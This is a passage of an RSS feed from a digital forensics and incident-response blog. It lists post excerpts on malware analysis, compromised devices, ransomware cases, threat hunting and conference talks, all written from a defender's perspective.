      <description>Introduction While working my way through the excellent &amp;ldquo;Linux Attack, Detection and Live Forensics&amp;rdquo; course from Defensive Security, I read the following line: If you are looking for a simple way to hide your process from the process list, then the bind mount operation is the answer. In order not to violate any copyright, I googled around and found the following gist from Timb-machine, where the same commands from the course are reflected:</description>
      
    </item>
    
    <item>
      <title>Removing Traces of RMM Tools</title>
      <link>https://dfir.ch/posts/cleanup_script_rmm/</link>
      <pubDate>Fri, 10 May 2024 09:26:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/cleanup_script_rmm/</guid>
      
      <description>Introduction Fox_threatintel tweeted recently about an open directory on 91.215.85.18:9380/. I downloaded all the files from this directory and stumbled upon a &amp;lsquo;cleaner&amp;rsquo; script, which we will examine in this short blog post. The original script is available on VirusTotal.
Figure 1: Tweet from Fox_threatintel Find installed software First, the script defines an array ($uninstallKeys), holding two registry keys:
$uninstallKeys = @( &amp;#34;HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall&amp;#34;, &amp;#34;HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall&amp;#34; ) In our case, the script explicitly searches for the RMM products Atera and Splashtop:</description>
      
    </item>
    
    <item>
      <title>Today I Learned - Zsh History Timestamps</title>
      <link>https://dfir.ch/posts/today_i_learned_zsh_timestamps/</link>
      <pubDate>Tue, 07 May 2024 19:58:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/today_i_learned_zsh_timestamps/</guid>
      
      <description>Zsh Timestamps In Zsh, which serves as the default shell for Kali, Gentoo, and macOS (replacing Bash in macOS Catalina), among others, the shell session retains the command history with timestamps in memory. Throughout the session, each executed command is logged in the history along with a timestamp denoting its execution time.
To view the command history on a live system, we can execute one of the following commands, which not only display the history but also include the timestamps adjacent to the commands:</description>
      
    </item>
    
    <item>
      <title>Canarytokens: Catching Insider Threats (and Threat Actors?)</title>
      <link>https://dfir.ch/posts/canarytokens/</link>
      <pubDate>Mon, 06 May 2024 09:15:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/canarytokens/</guid>
      
      <description>Insider Threat? We were contacted by a company that regularly sends emails to customers promoting new services and discounts. An Excel file is uploaded to a web server, where a job processes the file to create an email per customer, taking the email addresses from the uploaded Excel file.</description>
For a significant period of time, the company has been struggling with a serious issue - its competitors are reaching out to the same customers they intend to contact in the upcoming mailing, often a day or two earlier.</description>
      
    </item>
    
    <item>
      <title>Today I Learned - Device Discovery</title>
      <link>https://dfir.ch/posts/today_i_learned_device_discovery/</link>
      <pubDate>Sat, 27 Apr 2024 08:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/today_i_learned_device_discovery/</guid>
      
      <description>Introduction A client contacted us following an alert triggered by their Network Detection and Response sensor (NDR), which flagged suspicious network behavior originating from a server within their internal network. The detected activity resembled a port scan, suggesting that the server might have been compromised and was possibly being exploited by an attacker for initial reconnaissance. What added to the concern was the specific choice of ports scanned during the activity.</description>
      
    </item>
    
    <item>
      <title>Sysrv Infection (Linux Edition)</title>
      <link>https://dfir.ch/posts/sysrv/</link>
      <pubDate>Sun, 14 Apr 2024 15:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/sysrv/</guid>
      
      <description>Introduction On a recent incident response case, a customer contacted us regarding their EDR detecting a crypto miner on a Linux endpoint. The identified malicious file, named 41hs1z, is accessible on VirusTotal. The folders and paths associated with each execution of the crypto miner may differ; however, here are some paths we encountered:
/backup/files/excel/41hs1z /backup/files/xml/dotnet115/BeID/41hs1z /backup/files/xml/dotnet115/layouts/defaults/41hs1z Upon analysis, we discovered that the malware is a component of the Sysrv botnet. In this short blog post, we will examine the ELF binary to uncover its capabilities and identify IOCs associated with the sample.</description>
      
    </item>
    
    <item>
      <title>Varia</title>
      <link>https://dfir.ch/tweets/varia/</link>
      <pubDate>Wed, 03 Apr 2024 16:27:19 +0200</pubDate>
      
      <guid>https://dfir.ch/tweets/varia/</guid>
      
      <description>Seven Sins #1: Lack of patch management #2: Lack of MFA #3: Ignoring or misinterpreting AV alerts #4: Insufficient AD hardening #5: No in-depth analysis after a (security) incident #6: Direct access to the Internet #7: Lack of an EDR 10 AD Commandments #2: Service Accounts #3: Passwords #4: PowerShell Script Block Logging #5: Add Computers to the Domain #6: Privileges and Permissions #7: Harden Critical Accounts #8: Print Spooler Service #9: Relaying #10: Easy Wins (for Attackers) USB Malware Raspberry Robin Andromeda VBE VBE, Part 2 Macoute Sality vjw0rm Neshta Shodan Scan IP ranges for exposed services CobaltStrike Beacons Scan History Varia xlsxgrep </description>
      
    </item>
    
    <item>
      <title>MicroSocks: Convenient access through a compromised SonicWall SMA</title>
      <link>https://dfir.ch/posts/microsocks_sonicwall/</link>
      <pubDate>Sat, 30 Mar 2024 08:15:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/microsocks_sonicwall/</guid>
      
      <description>Introduction In a recent investigation conducted by my colleague, Giuseppe Paternicola, it was discovered that the initial entry point that ultimately led to the deployment of the Abyss ransomware was a compromised SonicWall Secure Mobile Access (SonicWall SMA) device. The threat actor exploited CVE-2021-20039 to gain access (Authenticated Command Injection). Subsequent analysis of the SonicWall revealed that the attacker had placed two files on the device, as illustrated in Figure 1.</description>
      
    </item>
    
    <item>
      <title>Azure Batch Misused for Crypto Mining</title>
      <link>https://dfir.ch/posts/azure_batch/</link>
      <pubDate>Fri, 15 Mar 2024 07:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/azure_batch/</guid>
      
      <description>Introduction A huge thanks to the Invictus-IR team for proofreading this blog post &amp;#x1f64f;
Recently, I posted a tweet regarding an unpatched TeamCity server that an attacker exploited to deploy a CoinMiner. In response to my tweet, the X (former Twitter) user, the cybersecurity doge, shared another story they investigated:
An attacker obtained access to an administrator Azure environment user. Once logged on to the tenant, he created a resource group and built 3 different batch accounts inside.</description>
      
    </item>
    
    <item>
      <title>Two in a row - You mitigated wrong (Kentico CMS RCE)</title>
      <link>https://dfir.ch/posts/kentico_cms_rce/</link>
      <pubDate>Wed, 06 Mar 2024 20:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/kentico_cms_rce/</guid>
      
      <description>How it started Figure 1: An unhandled exception occurred in w3wp.exe The customer contacted us regarding sporadic crashes of the IIS worker process (w3wp.exe). Before engaging an Incident Response company, the customer attempted to resolve the issue by repeatedly restoring the websites from backup. Moreover, they set up an entirely new server and migrated the affected sites to it, only to encounter the same outcomes (crashing the w3wp process). Additionally, the client passed on the following information:</description>
      
    </item>
    
    <item>
      <title>AWS Ransomware</title>
      <link>https://dfir.ch/posts/aws_ransomware/</link>
      <pubDate>Wed, 21 Feb 2024 05:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/aws_ransomware/</guid>
      
      <description>Background A customer contacted us reporting that an attacker had deleted several AWS S3 buckets (before allegedly downloading the data). Subsequently, the attacker left a ransom note (depicted below, sensitive information has been redacted). In this blog, we examine a recovery binary left behind by the attackers after deleting the buckets and show that the binary is nothing more than a red herring to increase the pressure on the victim.</description>
      
    </item>
    
    <item>
      <title>[s|l]trace - Linux Malware Analysis</title>
      <link>https://dfir.ch/posts/strace/</link>
      <pubDate>Thu, 01 Feb 2024 08:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/strace/</guid>
      
      <description>Introduction Craig Rowland, Founder and CEO of Sandfly Security, delivered a presentation titled Evasive Linux Malware at the Oslo Cold Incident Response Conference last year (Slides here, Presentation here), dissecting the notorious BPFDoor malware. In this post, we will analyze the BPFDoor backdoor only with the Linux utility strace, trying to get as much information as possible about the malware by tracing the executed syscalls from the binary. Swift assessments of malware samples like these can prove particularly beneficial for Incident Response teams in identifying Indicators of Compromise (IOC) for creating detection mechanisms or hunting purposes.</description>
      
    </item>
    
    <item>
      <title>Hunting AsyncRAT &amp; QuasarRAT</title>
      <link>https://dfir.ch/posts/asyncrat_quasarrat/</link>
      <pubDate>Mon, 15 Jan 2024 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/asyncrat_quasarrat/</guid>
      
      <description>Introduction Recorded Future writes in their Adversary Infrastructure Report 2023:
The top 5 malware families we detected this year are AsyncRAT, Quasar RAT, PlugX, ShadowPad, and DarkComet. Interestingly, the top 2 detections are open-source, and the last 3 are well-established tools, showing that our statement from last year&amp;rsquo;s report remains true:
[The] high level of commodity tool use indicates that threat actors are more concerned with blending in and being non-attributable rather than being undetectable, or have simply determined that their targets are not likely to detect even these well-known tools.</description>
      
    </item>
    
    <item>
      <title>Azure</title>
      <link>https://dfir.ch/tweets/azure/</link>
      <pubDate>Wed, 10 Jan 2024 16:27:19 +0200</pubDate>
      
      <guid>https://dfir.ch/tweets/azure/</guid>
      
      <description> Anomalous tokens eM Client Hunting Shadow Admins Sign-Ins from Nigeria Operating Systems Risk Detections Shady ASNs UnifiedAuditLogIngestionEnabled &amp;ldquo;Set-MailboxJunkEmailConfiguration&amp;rdquo; Circumvented MFA Malicious Inbox rules Blocked Senders and Domains </description>
      
    </item>
    
    <item>
      <title>DFIR</title>
      <link>https://dfir.ch/tweets/dfir/</link>
      <pubDate>Wed, 10 Jan 2024 16:27:19 +0200</pubDate>
      
      <guid>https://dfir.ch/tweets/dfir/</guid>
      
      <description>Persistence Techniques Get-Variable.exe Windows Silent Process Exit Word Templates PowerShell profile SSH Backdoor on Windows MPLog Microsoft Protection Log (MPLog) Find WebShells with the MPLog Yet another example of why the MPLog is awesome PowerShell Module Cache PowerShell V2 Exfiltration with Copy-Item PowerShell Script Block Logs AutoSaved files from PowerShell ISE Misc Windows Security Package AV Logs Bloodhound How to check GPO&amp;rsquo;s for signs of modifications WinSCP Artifacts RDP Logs Vulnerable Drivers Various ways to obfuscate an URL Ligolo-ng Silly misconfiguration - Great impact Windows Firewall Rules WMI Event Consumers Malpedia Hacked Wordpress site CoinMiner FileZilla Windows App Sideloading Audit breached passwords Recover deleted objects from AD </description>
      
    </item>
    
    <item>
      <title>Real-World PingCastle Findings</title>
      <link>https://dfir.ch/tweets/pingcastle/</link>
      <pubDate>Tue, 09 Jan 2024 16:27:19 +0200</pubDate>
      
      <guid>https://dfir.ch/tweets/pingcastle/</guid>
      
      <description>#1: Passwords in GPO’s Original Tweet
#2: Weak Password Policies Original Tweet
#3: Non-admin Users can add up to 10 Computer(s) to a Domain Original Tweet
#4: Dangerous Privileges Original Tweet
#6: Log Interactively on to the Domain Controllers Original Tweet
#7: “PASSWD_NOTREQD” Original Tweet
#8: Interesting Attack Paths Original Tweet
#8: Non-admin Users can add Computers to a Domain Original Tweet
#9: Recycle Bin is not enabled Original Tweet</description>
      
    </item>
    
    <item>
      <title>N-IOCs to Rule Them All</title>
      <link>https://dfir.ch/posts/n-iocs/</link>
      <pubDate>Sun, 31 Dec 2023 19:13:36 +0200</pubDate>
      
      <guid>https://dfir.ch/posts/n-iocs/</guid>
      
      <description>Introduction
We analyzed the top ten malware families in Switzerland (according to govcert.ch) during the period April - December 2022 to find patterns and overlaps in the forensic artifacts that a successful infection leaves on an endpoint.
We explicitly did not analyze the infection chain (how the infection happens – macros, wscript, hta, etc.), but rather the traces left by the second stage, i.e., the final malware executed on the endpoint.</description>
      
    </item>
    
    <item>
      <title>Threat Hunting</title>
      <link>https://dfir.ch/tweets/threathunting/</link>
      <pubDate>Fri, 11 Aug 2023 16:27:19 +0200</pubDate>
      
      <guid>https://dfir.ch/tweets/threathunting/</guid>
      
      <description>Remote Access Trojans (RATs) AsyncRAT AsyncRAT, Part 2 Quasar Rat Remote Monitoring and Management (RMM) action1 DWservice Remote Monitoring &amp;amp; Management (RMM) Splashtop User Agents User-Agent analysis User-Agents, Part 2 User-Agents, Part 3 SystemBC PowerShell version of SystemBC Misc NamedPipes DHCP Logs Hunting for hostname outliers Hidden User Account Non-Sucking Service Manager Renamed Binaries NSudo </description>
      
    </item>
    
    <item>
      <title>FIRST Conference: N-IOCs to Rule Them All</title>
      <link>https://dfir.ch/talks/firstcon_2023/</link>
      <pubDate>Fri, 05 May 2023 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/firstcon_2023/</guid>
      
      <description>Abstract The Swiss GovCERT published monthly statistics on the most common malware families in Switzerland. Much of the published analysis on these malware families focused on the malware&amp;rsquo;s reverse engineering rather than the forensic artifacts that a successful infection leaves on a host. In our research, we examined the top malware families from a forensic perspective to find commonalities in infection, data collection, and network transmission. Through the data obtained through our research, we were able to identify targeted IOC (Indicators of Compromise) that can be used for all malware families (for example, run keys, executables in the AppData folder, specific event logs).</description>
      
    </item>
    
    <item>
      <title>Swiss Cyber Storm: The Seven Deadly Sins</title>
      <link>https://dfir.ch/talks/swisscyberstorm_2022/</link>
      <pubDate>Tue, 25 Oct 2022 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/swisscyberstorm_2022/</guid>
      
      <description>Abstract Stephan Berger, Head of Investigations at InfoGuard, will share insights from recent InfoGuard CSIRT security incidents and present the seven biggest security failures of companies that still open the door to attackers far too often.
Figure 1: The Seven Deadly Sins Youtube Video </description>
      
    </item>
    
    <item>
      <title>Swiss Cyber Storm: Ransomware in Switzerland and around the World</title>
      <link>https://dfir.ch/talks/swisscyberstorm_2021/</link>
      <pubDate>Tue, 12 Oct 2021 16:04:20 +0200</pubDate>
      
      <guid>https://dfir.ch/talks/swisscyberstorm_2021/</guid>
      
      <description>Abstract Figure 1: Ransomware in Switzerland and around the World Youtube Video </description>
      
    </item>
    
  </channel>
</rss>
